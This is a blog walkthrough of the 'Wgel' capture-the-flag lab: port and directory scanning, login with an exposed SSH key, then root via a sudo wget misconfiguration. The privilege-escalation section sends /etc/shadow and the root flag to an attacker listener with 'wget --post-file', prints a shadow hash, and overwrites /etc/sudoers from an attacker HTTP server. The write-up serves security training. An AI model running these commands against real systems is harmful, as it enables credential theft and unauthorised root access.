Open in app

Sign in

Write

Sign in

Wgel CTF

Salvador Rodríguez
4 min readJul 27, 2021

This room is pretty neat. The initial part got me looking for exploits that did not exist, and getting to the last flag was fun. I liked how a misconfiguration allows getting the root flag in multiple ways. One without even requiring a root shell.

Nmap

sudo nmap -sS -sV -sC -p- -vv -oA scan 10.10.77.137

Output

# Nmap 7.91 scan initiated Mon Jul 26 23:28:56 2021 as: nmap -sS -sV -sC -p- -vv -oA scan 10.10.77.137
Nmap scan report for 10.10.77.137
Host is up, received echo-reply ttl 63 (0.16s latency).
Scanned at 2021-07-26 23:28:56 EDT for 468s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpgV7/18RfM9BJUBOcZI/eIARrxAgEeD062pw9L24Ulo5LbBeuFIv7hfRWE/kWUWdqHf082nfWKImTAHVMCeJudQbKtL1SBJYwdNo6QCQyHkHXslVb9CV1Ck3wgcje8zLbrml7OYpwBlumLVo2StfonQUKjfsKHhR+idd3/P5V3abActQLU8zB0a4m3TbsrZ9Hhs/QIjgsEdPsQEjCzvPHhTQCEywIpd/GGDXqfNPB0Yl/dQghTALyvf71EtmaX/fsPYTiCGDQAOYy3RvOitHQCf4XVvqEsgzLnUbqISGugF8ajO5iiY2GiZUUWVn4MVV1jVhfQ0kC3ybNrQvaVcXd
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDCxodQaK+2npyk3RZ1Z6S88i6lZp2kVWS6/f955mcgkYRrV1IMAVQ+jRd5sOKvoK8rflUPajKc9vY5Yhk2mPj8=
|   256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJhXt+ZEjzJRbb2rVnXOzdp5kDKb11LfddnkcyURkYke
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 26 23:36:44 2021 -- 1 IP address (1 host up) scanned in 468.71 seconds

Gobuster

Note: You should use /dirb/common.txt wordlist for your second scan

sudo gobuster dir -u http://10.10.77.137/ -w /usr/share/wordlists/dirb/common.txt -o diretorios.txt -k

Output

/sitemap (Status: 301) [Size: 314] [--> http://10.10.77.137/sitemap/]

2.

sudo gobuster dir -u http://10.10.77.137/sitemap/ -w /usr/share/wordlists/dirb/common.txt -o diretorios2.txt -k

Output

/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.ssh                 (Status: 301) [Size: 319] [--> http://10.10.77.137/sitemap/.ssh/]
/css                  (Status: 301) [Size: 318] [--> http://10.10.77.137/sitemap/css/]
/fonts                (Status: 301) [Size: 320] [--> http://10.10.77.137/sitemap/fonts/]
/images               (Status: 301) [Size: 321] [--> http://10.10.77.137/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 317] [--> http://10.10.77.137/sitemap/js/]

Initial Access

As I waited for gobuster’s second scan to finish, I explored the site in sitemap and did a quick search from which I found Unapp is a theme from colorlib. From this finding, I began looking for exploits and CVEs, but sadly found nothing useful. After trying the contact us button hoping to find a username but ended up with nothing, I decided to analyze the source code. I ended up giving fast on this since the code looked fresh out of the box from the template. At this point, I decided to go back and check the default Apache site, and that’s when I found the following.

Ha! So we now have our user.

gobuster ended up finding an interesting directory called .ssh, so yeah…you can guess what is in that directory.

So now we should use this key to connect.

If you get an error when sshing, run this command to change the file permissions

sudo chmod 400 id_rsa

User flag

location: /home/jessie/Documents

privesc

If we go and see what can we run as root

sudo -l

we see the following

(root) NOPASSWD: /usr/bin/wget

being able to run wget as sudo opens up some pretty interesting options since we can send files from this machine to ours or upload files to the machine which will keep the permissions.

To test this I decided to download the /etc/shadow file. Even though we don’t have access to the file, we can exploit the sudo capabilities to achieve it.

Attacker

sudo nc -lnvp 1234

Target

sudo wget --post-file=/etc/shadow 10.9.148.82:1234

and voilà

root:!:18195:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:17954:0:99999:7:::
uuidd:*:17954:0:99999:7:::
lightdm:*:17954:0:99999:7:::
whoopsie:*:17954:0:99999:7:::
avahi-autoipd:*:17954:0:99999:7:::
avahi:*:17954:0:99999:7:::
dnsmasq:*:17954:0:99999:7:::
colord:*:17954:0:99999:7:::
speech-dispatcher:!:17954:0:99999:7:::
hplip:*:17954:0:99999:7:::
kernoops:*:17954:0:99999:7:::
pulse:*:17954:0:99999:7:::
rtkit:*:17954:0:99999:7:::
saned:*:17954:0:99999:7:::
usbmux:*:17954:0:99999:7:::
jessie:$6$0wv9XLy.$HxqSdXgk7JJ6n9oZ9Z52qxuGCdFqp0qI/9X.a4VRJt860njSusSuQ663bXfIV7y.ywZxeOinj4Mckj8/uvA7U.:18195:0:99999:7:::
sshd:*:18195:0:99999:7:::

This is where things get funny. Just as we downloaded this file, we can just download the root flag! We just need to use the same syntax that the user flag file had, and we end up with the following command

sudo wget --post-file=/root/root_flag.txt 10.9.148.82:1234

Root shell

Even though we already have the flag, we clearly haven’t pwned the system, so let’s do it. For achieving this, we’ll do things the other way now, we will upload a file.

In the /etc folder, there is a file called sudoers. This file specifies which users have sudo access. What if we create our own, and upload it with the wget permissions?

We can just create a file called sudoers with the next content

jessie  ALL=(ALL) NOPASSWD: ALL

then, let’s start an HTTP server on our machine.

sudo python3 -m http.server 81

following this, we should upload it to the target’s etc directory. Since there is already a file called like this, it’s important to use the output parameter, so the content is written to the original file.

sudo wget http://10.9.148.82:81/sudoers --output-document=sudoers

Then just run a

sudo su

And our job here is done.

Root flag

location: /root

--

--

Salvador Rodríguez

Written by Salvador Rodríguez

2 Followers

InfoSec student, OSINT practitioner

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams